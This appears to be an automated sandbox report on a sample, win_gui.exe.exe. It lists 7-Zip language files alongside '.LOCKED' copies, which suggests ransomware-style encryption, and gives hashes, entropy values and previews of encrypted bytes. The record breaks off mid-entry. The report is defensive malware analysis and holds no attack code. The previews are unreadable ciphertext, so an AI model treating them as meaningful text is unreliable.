                                Preview:...2Wl$..._...|!.&.\.En*..... .Q.m..d..g..E'..n..!...:'.Q&...rc1......@k..;.....|Y...e+.N.u.+.2.....n.-X].*....eG..Ok.?../.....MQ'............Ri..?...%.$....:p.Y._......G.;..|E{C.f..f..Z.#.;O..I.R..2.#..6c......i.~s..F\...........g.....s6xoW.a.}58..oW[.v.u.C....6.p.j.S......)....kt0.i..`..x.J..D.k/R..9..T(;S.%.n..e...-=..W).2..c/..Q...E..L..a$iif.n..|#..l`..{O.V[W....s@.?7.If..3.?.....'.:.........*...E.....}..]...t..z.CX9.0.._bh.7mX..K..9....YC.....@...W...NJ:8..[...<n... .E."o.G.....(...sI7...Q.....c-...g.........%.}G.......F.B@=.......c...qRR.&....+.9....]PaL..@.8.S....j...1..8..3....m.k... 6.s.l.][.XY.N.o..U.4O...!..m..j2.]...zn..(..&...............M...."s.ZtM....yp...7....X.z."....1..k.d.K.p...d..'.{]D..R..m,..Y.as.m..0I...........J..K..".|.4.....\,{..QR=.e e.|...q!.......@..yZ.e\/....x..n]T......b..N6.=...M..FNT....2....g...#^...=T..Fe@....}O....v$ F..+R.-.o.;.){.s..}.V......t!..K.QP..K.N..1hU@.RR...Q%.0[..+..E.Y..e......%..d

                                C:\Program Files\7-Zip\Lang\az.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10227
                                Entropy (8bit):7.982331981122129
                                Encrypted:false
                                SSDEEP:192:K1ul4OasLJSfjLQrkxB/aV2kn3L/KIIH7kWOGWIAa+yGwaUv+VOM:KQ4O1AIIbY22SAWOGb+yGov+VOM
                                MD5:63ED1D2EF8657E967CD5C711F1DDB816
                                SHA1:EB1B1784A58724E4D31B4899ED7ACF35EFE404C7
                                SHA-256:D951C7497BA7236C0F7843EF213072B818FC4F08528E1075CA8F358F0C3FAD7F
                                SHA-512:4E78FB6851B17AF78FAF7FB5F0262BD716AA7FD5564350F33A24CBD7F0B95FE01400ED8C11E1F221B322438832072B815C773DC4330DEA7CAE1005182C701D60
                                Malicious:false
                                Preview:...2Wl$..._...|!.&.\.En*..... .Q.m..d..g..E'..n..!...:'.Q&...rc1......@k..;.....|Y...e+.N.u.+.2.....n.-X].*....eG..Ok.?../.....MQ'............Ri..?...%.$....:p.Y._......G.;..|E{C.f..f..Z.#.;O..I.R..2.#..6c......i.~s..F\...........g.....s6xoW.a.}58..oW[.v.u.C....6.p.j.S......)....kt0.i..`..x.J..D.k/R..9..T(;S.%.n..e...-=..W).2..c/..Q...E..L..a$iif.n..|#..l`..{O.V[W....s@.?7.If..3.?.....'.:.........*...E.....}..]...t..z.CX9.0.._bh.7mX..K..9....YC.....@...W...NJ:8..[...<n... .E."o.G.....(...sI7...Q.....c-...g.........%.}G.......F.B@=.......c...qRR.&....+.9....]PaL..@.8.S....j...1..8..3....m.k... 6.s.l.][.XY.N.o..U.4O...!..m..j2.]...zn..(..&...............M...."s.ZtM....yp...7....X.z."....1..k.d.K.p...d..'.{]D..R..m,..Y.as.m..0I...........J..K..".|.4.....\,{..QR=.e e.|...q!.......@..yZ.e\/....x..n]T......b..N6.=...M..FNT....2....g...#^...=T..Fe@....}O....v$ F..+R.-.o.;.){.s..}.V......t!..K.QP..K.N..1hU@.RR...Q%.0[..+..E.Y..e......%..d

                                C:\Program Files\7-Zip\Lang\ba.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11849
                                Entropy (8bit):7.985370744892276
                                Encrypted:false
                                SSDEEP:192:6UWDhY2WtcjAHj5IBB6zsMUe53+QTHR437u73ZQKKUdvd0QdZ3/9ZCrgAOAK5upx:QY2Wtc21IBkzs1e5tTHREWSh613XCra8
                                MD5:070E3EADB02E8B641CB7D523DA1585D5
                                SHA1:2F9C9182DF9C65B4288B74510899B2969031A326
                                SHA-256:1FC14658B739682DEDC6733579C4656657A805BD7F7A7E5067BB01A62A9C826D
                                SHA-512:C2E4BDD0B1FE140634892164DBC178EE48868845E739A13BBA8475B2819735C5CC87B921D98F4FF0538F74EA5588DFE8BF32AE0F6781CA06C4488D36F2007CA4
                                Malicious:false
                                Preview:..X..i>P.'....\..7a.J..q.O.:B+...)...4.Z^M.^.n.{..\?OG...K..;.ZT.?.nau...5.!..4.m.%.c..!..-....9....w.O}.|.O5.y....o.!J.....D....HRe..R.)....d..B._........G.T....k..hw.~.=q.......W....y.. ...BP.d.Aeg#.@E....*...w.[%.........K.....r.K...)c...}...-.2},..l...V......y?@..z4.d..\...<..p...........S.,6.].....>....<C..o.(8.+..ph&]...>Ed.......`H...=..<zd.or.~.....Hg.4...h4Z..E....l./F........K<...".;....(pxg$..g.wT.K...E&...&.J.5{....ZZ..........@.G..Jh.......1...|M..{.6.._..o..2..0...V.......0h...P6e..j.....}eN.<C..}.c.........."5Zd......h*.A.3 .....f%|.N..a#u."...EJ.:7...eS.D....3....4...e....,dw. ;[....(.....X.>.f...L.P.x%A.kP...T...u..t\....0.6......m.O.7..tX |.................k..o~.D..oR....&.y.g..B..i.@^X..fu{:....j24...J...P.6.).%oY....1{....`.gn[6..\JB.I)<<..,.x.......H\<...N.)..M.^....^..X..4."c ..R..BZZ.J..`...a......s.b....j=8..C(ln...w.............T.....@N..z.-.I..*.t......<x..[.n.......?.qx..n.-.PM.:..'E...3..{..3Tnu...]..$.....EcD..

                                C:\Program Files\7-Zip\Lang\ba.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11849
                                Entropy (8bit):7.985370744892276
                                Encrypted:false
                                SSDEEP:192:6UWDhY2WtcjAHj5IBB6zsMUe53+QTHR437u73ZQKKUdvd0QdZ3/9ZCrgAOAK5upx:QY2Wtc21IBkzs1e5tTHREWSh613XCra8
                                MD5:070E3EADB02E8B641CB7D523DA1585D5
                                SHA1:2F9C9182DF9C65B4288B74510899B2969031A326
                                SHA-256:1FC14658B739682DEDC6733579C4656657A805BD7F7A7E5067BB01A62A9C826D
                                SHA-512:C2E4BDD0B1FE140634892164DBC178EE48868845E739A13BBA8475B2819735C5CC87B921D98F4FF0538F74EA5588DFE8BF32AE0F6781CA06C4488D36F2007CA4
                                Malicious:false
                                Preview:..X..i>P.'....\..7a.J..q.O.:B+...)...4.Z^M.^.n.{..\?OG...K..;.ZT.?.nau...5.!..4.m.%.c..!..-....9....w.O}.|.O5.y....o.!J.....D....HRe..R.)....d..B._........G.T....k..hw.~.=q.......W....y.. ...BP.d.Aeg#.@E....*...w.[%.........K.....r.K...)c...}...-.2},..l...V......y?@..z4.d..\...<..p...........S.,6.].....>....<C..o.(8.+..ph&]...>Ed.......`H...=..<zd.or.~.....Hg.4...h4Z..E....l./F........K<...".;....(pxg$..g.wT.K...E&...&.J.5{....ZZ..........@.G..Jh.......1...|M..{.6.._..o..2..0...V.......0h...P6e..j.....}eN.<C..}.c.........."5Zd......h*.A.3 .....f%|.N..a#u."...EJ.:7...eS.D....3....4...e....,dw. ;[....(.....X.>.f...L.P.x%A.kP...T...u..t\....0.6......m.O.7..tX |.................k..o~.D..oR....&.y.g..B..i.@^X..fu{:....j24...J...P.6.).%oY....1{....`.gn[6..\JB.I)<<..,.x.......H\<...N.)..M.^....^..X..4."c ..R..BZZ.J..`...a......s.b....j=8..C(ln...w.............T.....@N..z.-.I..*.t......<x..[.n.......?.qx..n.-.PM.:..'E...3..{..3Tnu...]..$.....EcD..

                                C:\Program Files\7-Zip\Lang\be.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12469
                                Entropy (8bit):7.9846505850483025
                                Encrypted:false
                                SSDEEP:384:867Lu0VXpeCt1zAcwZyLmZ+nXYcg0+VOu:L/1DekNPwZ/+nI0K
                                MD5:BBCA6F537F6CE990335CD94EB24483A1
                                SHA1:871A7A1592BD129CC8FE02EDF690A605DF13F65A
                                SHA-256:1826D98809E6CC3C1AE5A1E8AD65FFB73199E4F9C68E2CCAE8A0B44C99C29823
                                SHA-512:58255EDBBBF7991F53A2D695DCFD9D657F85AADBF3E360E33397FA09B86E817379B3F2A7B68EB27B0D07A20FCBD410046646C0F00BB9D2F1870B35780B246420
                                Malicious:false
                                Preview:.S...._.[.."t.p.....e.c.S...2.....D.T3..{A.P|.{W.k.....UL.S.92...Q.....l".....O..8;..f..fm..].T.eY.p..A.]..m4...<......8...?Y..z.*...'3~Zq.<.)sk..J..:mg._..G)<..}sqG.E.y.....H j5..yB[.5....*n............_Yg.+....../..*.}..84....-...1%....;.f...]4./'....`.......s..d..Z...6z..\..(.D..K.{.1.Mv..<.....F.:.Fc..G..~.0..~v.z.P......P-.......^.c..^>w..M.-..(..,..r...R.......4.s.\.s..kc....J.@].y.S*..4...q'.E..I...~...V....6.U;Z.......q$.(W.....i.^d..q.@.......&3u.#)...:.xz........m..~...X2.y.?..V..?....gm....^.(R.8.Lg..>n.....z^.U..P..".xs.j.Z.>.xO...Z.S...'.z.'/m_......h.'Y..z..'+x:.._...X..~.....5f...K#..i.V?y[.p.L.z`.;....7.)...mH2........Z...d......@.`..."....].s+tzQ}....,..C.,.5.;........Xo....z..V........R.d...f.-ym./..0....b.....G..6&.F{.%w.........Av....[A .dhIN.....ct...M~<..x.8 .~....j.*.....m.[U.*7....|.C5j...>).:...|.P.!m.G...xZ..`B.........i.M....3.V.z.Ef.a;.a.P..q.3.koV~^.:.V.s(.F.]..)g...J..........&.9`....~..Ni..!D..k+.=.M%..G....pY..Z...

                                C:\Program Files\7-Zip\Lang\be.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12469
                                Entropy (8bit):7.9846505850483025
                                Encrypted:false
                                SSDEEP:384:867Lu0VXpeCt1zAcwZyLmZ+nXYcg0+VOu:L/1DekNPwZ/+nI0K
                                MD5:BBCA6F537F6CE990335CD94EB24483A1
                                SHA1:871A7A1592BD129CC8FE02EDF690A605DF13F65A
                                SHA-256:1826D98809E6CC3C1AE5A1E8AD65FFB73199E4F9C68E2CCAE8A0B44C99C29823
                                SHA-512:58255EDBBBF7991F53A2D695DCFD9D657F85AADBF3E360E33397FA09B86E817379B3F2A7B68EB27B0D07A20FCBD410046646C0F00BB9D2F1870B35780B246420
                                Malicious:false
                                Preview:.S...._.[.."t.p.....e.c.S...2.....D.T3..{A.P|.{W.k.....UL.S.92...Q.....l".....O..8;..f..fm..].T.eY.p..A.]..m4...<......8...?Y..z.*...'3~Zq.<.)sk..J..:mg._..G)<..}sqG.E.y.....H j5..yB[.5....*n............_Yg.+....../..*.}..84....-...1%....;.f...]4./'....`.......s..d..Z...6z..\..(.D..K.{.1.Mv..<.....F.:.Fc..G..~.0..~v.z.P......P-.......^.c..^>w..M.-..(..,..r...R.......4.s.\.s..kc....J.@].y.S*..4...q'.E..I...~...V....6.U;Z.......q$.(W.....i.^d..q.@.......&3u.#)...:.xz........m..~...X2.y.?..V..?....gm....^.(R.8.Lg..>n.....z^.U..P..".xs.j.Z.>.xO...Z.S...'.z.'/m_......h.'Y..z..'+x:.._...X..~.....5f...K#..i.V?y[.p.L.z`.;....7.)...mH2........Z...d......@.`..."....].s+tzQ}....,..C.,.5.;........Xo....z..V........R.d...f.-ym./..0....b.....G..6&.F{.%w.........Av....[A .dhIN.....ct...M~<..x.8 .~....j.*.....m.[U.*7....|.C5j...>).:...|.P.!m.G...xZ..`B.........i.M....3.V.z.Ef.a;.a.P..q.3.koV~^.:.V.s(.F.]..)g...J..........&.9`....~..Ni..!D..k+.=.M%..G....pY..Z...

                                C:\Program Files\7-Zip\Lang\bg.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13704
                                Entropy (8bit):7.986560984724494
                                Encrypted:false
                                SSDEEP:384:QUNBss3bHVzm9rCConw2LrIqZIgyE/y+VO/1o:5TLRqevnw2IqZIE/yu
                                MD5:E8CBC70132694E89A8A26FE6DD5C8B50
                                SHA1:67891AC5AE90A32A3066913E061705A3CF629DF2
                                SHA-256:04CFC0B3E4F63031BBF295CCEEDF85AA4DB348D6EDB69C125DF725552FB71727
                                SHA-512:BE0278A28380A556DF9C24BF8F4E857BADCD9D12AF7AC52AD276E116034AF567B39A91B7C3E2B8215FD55CBFB703923E477EC16358E6F6E95A91F74B4AC009D3
                                Malicious:false
                                Preview:..q\.=.<..Q..4W/...2y.1...............w;....9C.....v?.[..]...r.^~.Uk^>.-.$.sK.VKEt....+I.y#..M..#[F..y../.....Q..P._.|...76.$...;..6......RH.B.M..D..u..T...M-...n....26..p.......[A..c.W..yy././...JKp..'?..+..!..|A.....CFE..q......[.x..(n.....w...F$_3.9,..8h.....:....a....(..m.........o..*.`.......o..~...mf...."..!../:...X.v..,.c...F..._/.....)l.P-.....b..rh.l.uG3/.h.#e.A)..`....o.q..B..h.+<.`... %..<-+ut..\#i..~....{y29.[x..^.F....g.B..h$T.(..V.....A..j.QdC..^(y...Q)...sN.....LOz.].{iW.,.iA'.....[. ..M..6.I.*+8.n;....SUy......P ........+t<...X^..r.8.}x.^....t..x.a.'.F...=..tf{R..9..G.R....y`..*...I...G.9...5.E...9.U...]E.....A..d....o......cv.....yP.QO..J..`&>y.t,..F.=.[V....h....k.....n.....o.W....4*.E.\..n.]...E=..a....Cb...@}..k....l<.*.4...#].......$7;.z....{.M..\.9....>r:...1lLQ1..z....B7;...r.#._..asb.)<...g.s..|.{LG...B....k.jb............(.o..0S....4...dr.tZ..U&.V..F..>.W/..o>..A<....8..#.NY7.00%.8..Y..v...0F.D.....Z...71.j...>l..Cd

                                C:\Program Files\7-Zip\Lang\bg.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13704
                                Entropy (8bit):7.986560984724494
                                Encrypted:false
                                SSDEEP:384:QUNBss3bHVzm9rCConw2LrIqZIgyE/y+VO/1o:5TLRqevnw2IqZIE/yu
                                MD5:E8CBC70132694E89A8A26FE6DD5C8B50
                                SHA1:67891AC5AE90A32A3066913E061705A3CF629DF2
                                SHA-256:04CFC0B3E4F63031BBF295CCEEDF85AA4DB348D6EDB69C125DF725552FB71727
                                SHA-512:BE0278A28380A556DF9C24BF8F4E857BADCD9D12AF7AC52AD276E116034AF567B39A91B7C3E2B8215FD55CBFB703923E477EC16358E6F6E95A91F74B4AC009D3
                                Malicious:false
                                Preview:..q\.=.<..Q..4W/...2y.1...............w;....9C.....v?.[..]...r.^~.Uk^>.-.$.sK.VKEt....+I.y#..M..#[F..y../.....Q..P._.|...76.$...;..6......RH.B.M..D..u..T...M-...n....26..p.......[A..c.W..yy././...JKp..'?..+..!..|A.....CFE..q......[.x..(n.....w...F$_3.9,..8h.....:....a....(..m.........o..*.`.......o..~...mf...."..!../:...X.v..,.c...F..._/.....)l.P-.....b..rh.l.uG3/.h.#e.A)..`....o.q..B..h.+<.`... %..<-+ut..\#i..~....{y29.[x..^.F....g.B..h$T.(..V.....A..j.QdC..^(y...Q)...sN.....LOz.].{iW.,.iA'.....[. ..M..6.I.*+8.n;....SUy......P ........+t<...X^..r.8.}x.^....t..x.a.'.F...=..tf{R..9..G.R....y`..*...I...G.9...5.E...9.U...]E.....A..d....o......cv.....yP.QO..J..`&>y.t,..F.=.[V....h....k.....n.....o.W....4*.E.\..n.]...E=..a....Cb...@}..k....l<.*.4...#].......$7;.z....{.M..\.9....>r:...1lLQ1..z....B7;...r.#._..asb.)<...g.s..|.{LG...B....k.jb............(.o..0S....4...dr.tZ..U&.V..F..>.W/..o>..A<....8..#.NY7.00%.8..Y..v...0F.D.....Z...71.j...>l..Cd

                                C:\Program Files\7-Zip\Lang\bn.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15645
                                Entropy (8bit):7.988756299726234
                                Encrypted:false
                                SSDEEP:384:P9qMTQK6ZdtPM7AGjOjUob2ZQ4CpybRMkpgf+4AjUjBPM+VOi:lfTQK6HGjOjUc4CpybRr++hYjCe
                                MD5:51A72D21CE85A1DC223BB5842D10C671
                                SHA1:C07C370BC51827451DC3C0F053E891E504F03A78
                                SHA-256:805607C18396BDA8371E6FFA22194F0FD7227C0E780B72AA3CFAAF21D046EDED
                                SHA-512:2A22743981DBC979A7C8437288903CF4C35E5D0447AA7AE7C1BDA992692A9529897AD4156089C227C8239BE0E4FA2660F1EB006B5DE75B09E9F7FD97473104FB
                                Malicious:false
                                Preview:......K..K......!ph...A.*....wp@7F..=.N.@.U..F#J.....qKh.....M..\..U\..B.......R...u$/......Hvd.q.....@a..d^.}:..D...5.{YwP.K.....:O.a..8..A.*.....o.S..J\..n_..FV...|..D..i.X...3.].u.1'.~..B._\...c.....o.*.N1.H.yX..Jt.L...#.E.N=e].7....P_.w....o....~E....!.x,..29.~..i..G..D(....4..........A......,Ut..E..s_..~E.g...?.k../?.cC....Hv...^p+.......z^\n$..."u.......r......o.>..4.*.w.m....W........`..<..-....M..hL:......rUc.|D.6n...ruQ..>._....[..r:Y.-.NY..<<o.L...|....EH...vM..g....Y....Hl.9...n..?y..G.......P...B...d.b...........<.N.`.S.#......<)r^..#..6.w.?.......i....|..SE... &N.%,*.n....=..l...z/fi.}...gc...].e....zUo..B.).hk.%...d1...kr...._E'IB76..*..1G..C..S.P..H..~...-X.moU2.QBlp...04v^b.6.!.C_J..46W...r..6{...yP...X,6..6.+}...........l(f.....M.?.+..c..7.>......z.*q=......E../.6..$].OY......Kh..+.M:>q...H?s..U....N....b....Cw.2F..V.2.#eA..uN....|IM....K.7..z...U.._.0*.eSY.tMD........._..~/..;...Xq.^-....i.\..Y....y...|).' ...G%

                                C:\Program Files\7-Zip\Lang\bn.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15645
                                Entropy (8bit):7.988756299726234
                                Encrypted:false
                                SSDEEP:384:P9qMTQK6ZdtPM7AGjOjUob2ZQ4CpybRMkpgf+4AjUjBPM+VOi:lfTQK6HGjOjUc4CpybRr++hYjCe
                                MD5:51A72D21CE85A1DC223BB5842D10C671
                                SHA1:C07C370BC51827451DC3C0F053E891E504F03A78
                                SHA-256:805607C18396BDA8371E6FFA22194F0FD7227C0E780B72AA3CFAAF21D046EDED
                                SHA-512:2A22743981DBC979A7C8437288903CF4C35E5D0447AA7AE7C1BDA992692A9529897AD4156089C227C8239BE0E4FA2660F1EB006B5DE75B09E9F7FD97473104FB
                                Malicious:false
                                Preview:......K..K......!ph...A.*....wp@7F..=.N.@.U..F#J.....qKh.....M..\..U\..B.......R...u$/......Hvd.q.....@a..d^.}:..D...5.{YwP.K.....:O.a..8..A.*.....o.S..J\..n_..FV...|..D..i.X...3.].u.1'.~..B._\...c.....o.*.N1.H.yX..Jt.L...#.E.N=e].7....P_.w....o....~E....!.x,..29.~..i..G..D(....4..........A......,Ut..E..s_..~E.g...?.k../?.cC....Hv...^p+.......z^\n$..."u.......r......o.>..4.*.w.m....W........`..<..-....M..hL:......rUc.|D.6n...ruQ..>._....[..r:Y.-.NY..<<o.L...|....EH...vM..g....Y....Hl.9...n..?y..G.......P...B...d.b...........<.N.`.S.#......<)r^..#..6.w.?.......i....|..SE... &N.%,*.n....=..l...z/fi.}...gc...].e....zUo..B.).hk.%...d1...kr...._E'IB76..*..1G..C..S.P..H..~...-X.moU2.QBlp...04v^b.6.!.C_J..46W...r..6{...yP...X,6..6.+}...........l(f.....M.?.+..c..7.>......z.*q=......E../.6..$].OY......Kh..+.M:>q...H?s..U....N....b....Cw.2F..V.2.#eA..uN....|IM....K.7..z...U.._.0*.eSY.tMD........._..~/..;...Xq.^-....i.\..Y....y...|).' ...G%

                                C:\Program Files\7-Zip\Lang\br.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5965
                                Entropy (8bit):7.966620248686193
                                Encrypted:false
                                SSDEEP:96:9iK7RUhFx4dRQ1g1M2fehdEHO/kuvGr1VKPODsJnpexUb3jVeJNevuAVOE:RRu2RQ1g1M2fwEHOyKmDsLexUFeN+VOE
                                MD5:5D4AA59973679B2357124A3C4F01BBD7
                                SHA1:30775A68389470EA01188D376E9F897693ABEC01
                                SHA-256:AAEC878A40E9704E6A54388D76025F9177920C10D510508215BEEBE8E3DC0829
                                SHA-512:3002208BA32C9846D25EB4FE69E52C2EAE5495C285E3053DF3EE5D31D4AE4221A5CAABF1818F0C40D4B0C42AF3FA9B4268C3724EE36DFEF0985E8F530928D0D3
                                Malicious:false
                                Preview:..<r.D.?..,......GZ|&......?1.<.2..".P.;...T.wU..r.9W.~s.....y..3.U....5...Y..y.&.......#.@.E-....Jt...M....-.l..V:G.0....}.../...Zcq.xV...r..N...,.....S......k....S.....^.....I_mY.....Ky*T.t. ......V..b....B.fM..T%....zl.S.A=.*..|.s<.c[:..q.0........\..^..M..i._..].f.e-C...{&!...o:..J.............E4....klv.pU............\o}.._0Z+.L.......y..)..D#...&.jHF..,.8.~s..P.BQTJ..4..b....D..s..........Vh..C:y@....k;...x.M.X..ZI.d...."......'=..=(/..B..0...m.M..W....;b...M_..\....:....~..W^..H.v..;5):o...U.7..9?....y...D...6:K(bysb..j5...B8g.7F.........'.N,.....;Gu.....+~h...RbRcq..3.......$......8..e.:^,`./..I~~..9.e.#.<3Z.Nz..F8j.R6........A...@....gy=..r...=...D..I.'.[Uy.&Y@..?...3N..P.9...}...E....A..3.-8.......O..u.L/...v6x ..}...Mym..L..y.s...Z~.....[...!z...g..,a-,.b..[/.*+f....*.f....AkAZo.-..N.|n.d.!z.M...+.<<-d\...O.]..V...>....Q...P<i..j........O6.Ina......n.m....0.nO.<... I...?...[.#Cmi....Q`A.T.l..v.l#....2.lp....}.2..........

                                C:\Program Files\7-Zip\Lang\br.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5965
                                Entropy (8bit):7.966620248686193
                                Encrypted:false
                                SSDEEP:96:9iK7RUhFx4dRQ1g1M2fehdEHO/kuvGr1VKPODsJnpexUb3jVeJNevuAVOE:RRu2RQ1g1M2fwEHOyKmDsLexUFeN+VOE
                                MD5:5D4AA59973679B2357124A3C4F01BBD7
                                SHA1:30775A68389470EA01188D376E9F897693ABEC01
                                SHA-256:AAEC878A40E9704E6A54388D76025F9177920C10D510508215BEEBE8E3DC0829
                                SHA-512:3002208BA32C9846D25EB4FE69E52C2EAE5495C285E3053DF3EE5D31D4AE4221A5CAABF1818F0C40D4B0C42AF3FA9B4268C3724EE36DFEF0985E8F530928D0D3
                                Malicious:false
                                Preview:..<r.D.?..,......GZ|&......?1.<.2..".P.;...T.wU..r.9W.~s.....y..3.U....5...Y..y.&.......#.@.E-....Jt...M....-.l..V:G.0....}.../...Zcq.xV...r..N...,.....S......k....S.....^.....I_mY.....Ky*T.t. ......V..b....B.fM..T%....zl.S.A=.*..|.s<.c[:..q.0........\..^..M..i._..].f.e-C...{&!...o:..J.............E4....klv.pU............\o}.._0Z+.L.......y..)..D#...&.jHF..,.8.~s..P.BQTJ..4..b....D..s..........Vh..C:y@....k;...x.M.X..ZI.d...."......'=..=(/..B..0...m.M..W....;b...M_..\....:....~..W^..H.v..;5):o...U.7..9?....y...D...6:K(bysb..j5...B8g.7F.........'.N,.....;Gu.....+~h...RbRcq..3.......$......8..e.:^,`./..I~~..9.e.#.<3Z.Nz..F8j.R6........A...@....gy=..r...=...D..I.'.[Uy.&Y@..?...3N..P.9...}...E....A..3.-8.......O..u.L/...v6x ..}...Mym..L..y.s...Z~.....[...!z...g..,a-,.b..[/.*+f....*.f....AkAZo.-..N.|n.d.!z.M...+.<<-d\...O.]..V...>....Q...P<i..j........O6.Ina......n.m....0.nO.<... I...?...[.#Cmi....Q`A.T.l..v.l#....2.lp....}.2..........

                                C:\Program Files\7-Zip\Lang\ca.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9906
                                Entropy (8bit):7.980330486140865
                                Encrypted:false
                                SSDEEP:192:iRVlBAlwFY2tKthX+g+5S5PYZbWKV4X4HIUc7ryAsFuughIumf9GbTAIyX+VOs:ixiu22An+g5PYZyK+oy7rqF4hEX+VOs
                                MD5:2F66A21AC0D9BC8078A4B97697C023EC
                                SHA1:47657B2AAD0082661119FF406134EC34EA27FA79
                                SHA-256:C0F82820DFA7A967C7EB063B925312D0DDDB38E8876812D3AEE0804483FBC502
                                SHA-512:BEBFE52472FBB3DE77E503869E74CDDBD5B0D34A4A131726F61F1480427EF9E1711B9DBC2C2FACA60A5B7637E3E14FE62CECBEE0B1C3C775A3DEF5E94E99CA92
                                Malicious:false
                                Preview:|....Cr..&..-.Z..hv`\.Pk.h.qB...G.|)x.a.?.}...uH...av.$...vH......$./R..;&.$...$.Z.....e..5.1W.g9|..C.@)..v.1X..8.....2T.x....o.tM.`....q.n.I!;..N..K..I.|VQJZ........!o.V'...b.(.o..S..)V7...H.H#\y9.Rc.k..\.@A.bR_.1!%..7...yHB..j...1;ez.f,1x,.K*W..$.....+....1..,..MzX...;.<..!...5$(._8T..o.2......@..i..X.>...Xd]p.....o"...ID6........^. $u.>RI..\l[.s=.O..Z[....H.N.m..M.+b...$...P<WN.*.2]2i...-".R../..D"u..-...wH.E..i1./..t.}$..l.:..iY.0:.IJ{."rRA.p.;.Y.k..{w..0..).B./.!qa..x........sQ...E...B..&Uie....g.Eql.K._Z.I.k..Z..#.....%.NSG.KL+.-.<...BB...G.F....:....(-.....ZTM22t.....C`.B....Fv..;.0.?{...4..,JV../)..w..8?....u4...g.D....@....'. ..N..RA.....v./.SS.G.v...m.1.....Z,..0.......R."..@.......I&.Z.f.C.e}[..._<..J.....<......w%.,<....o.sDG..D.........../."..T.....#O.0P......d.a.82.gv....c...Y...b........B...z.r|.N.M.......U:...6.h...kz...pt.r..%..r..7@.u.....J.....,.Ce_.A......\..\+(..zO.....(.....3.....R..-v.OgJ.b...(.9?.W..q'......!T...X.7.).cA

                                C:\Program Files\7-Zip\Lang\ca.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9906
                                Entropy (8bit):7.980330486140865
                                Encrypted:false
                                SSDEEP:192:iRVlBAlwFY2tKthX+g+5S5PYZbWKV4X4HIUc7ryAsFuughIumf9GbTAIyX+VOs:ixiu22An+g5PYZyK+oy7rqF4hEX+VOs
                                MD5:2F66A21AC0D9BC8078A4B97697C023EC
                                SHA1:47657B2AAD0082661119FF406134EC34EA27FA79
                                SHA-256:C0F82820DFA7A967C7EB063B925312D0DDDB38E8876812D3AEE0804483FBC502
                                SHA-512:BEBFE52472FBB3DE77E503869E74CDDBD5B0D34A4A131726F61F1480427EF9E1711B9DBC2C2FACA60A5B7637E3E14FE62CECBEE0B1C3C775A3DEF5E94E99CA92
                                Malicious:false
                                Preview:|....Cr..&..-.Z..hv`\.Pk.h.qB...G.|)x.a.?.}...uH...av.$...vH......$./R..;&.$...$.Z.....e..5.1W.g9|..C.@)..v.1X..8.....2T.x....o.tM.`....q.n.I!;..N..K..I.|VQJZ........!o.V'...b.(.o..S..)V7...H.H#\y9.Rc.k..\.@A.bR_.1!%..7...yHB..j...1;ez.f,1x,.K*W..$.....+....1..,..MzX...;.<..!...5$(._8T..o.2......@..i..X.>...Xd]p.....o"...ID6........^. $u.>RI..\l[.s=.O..Z[....H.N.m..M.+b...$...P<WN.*.2]2i...-".R../..D"u..-...wH.E..i1./..t.}$..l.:..iY.0:.IJ{."rRA.p.;.Y.k..{w..0..).B./.!qa..x........sQ...E...B..&Uie....g.Eql.K._Z.I.k..Z..#.....%.NSG.KL+.-.<...BB...G.F....:....(-.....ZTM22t.....C`.B....Fv..;.0.?{...4..,JV../)..w..8?....u4...g.D....@....'. ..N..RA.....v./.SS.G.v...m.1.....Z,..0.......R."..@.......I&.Z.f.C.e}[..._<..J.....<......w%.,<....o.sDG..D.........../."..T.....#O.0P......d.a.82.gv....c...Y...b........B...z.r|.N.M.......U:...6.h...kz...pt.r..%..r..7@.u.....J.....,.Ce_.A......\..\+(..zO.....(.....3.....R..-v.OgJ.b...(.9?.W..q'......!T...X.7.).cA

                                C:\Program Files\7-Zip\Lang\co.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11560
                                Entropy (8bit):7.980960245105568
                                Encrypted:false
                                SSDEEP:192:C8zLfHklyDFdATQiIvkSocETjzp2CvHXIpPiayhA+dPRCVnR+VO7G:C8HkADFdAVxcET3NHYpP7b+VUz+VO6
                                MD5:F6A454AED91ACFEE159B161957C99D45
                                SHA1:F2B7032479182C903A9059C72BF7F9C5E128C62F
                                SHA-256:3F1879519706FE95C195C05DA47CA391736D18BAEA455AE94957FF290037BEA9
